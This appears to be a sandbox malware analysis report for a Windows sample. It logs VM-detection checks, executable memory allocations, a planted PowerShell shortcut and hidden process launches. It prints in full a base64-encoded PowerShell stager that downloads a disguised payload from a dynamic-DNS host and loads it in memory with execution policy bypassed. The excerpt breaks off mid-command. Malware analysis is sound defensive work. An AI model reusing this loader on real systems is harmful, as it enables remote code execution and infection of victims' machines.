CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00401a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 1, 2024, 10:56 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 157 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:56 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 1, 2024, 10:56 a.m.	thread_identifier: 2200 thread_handle: 0x00000334 process_identifier: 2196 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8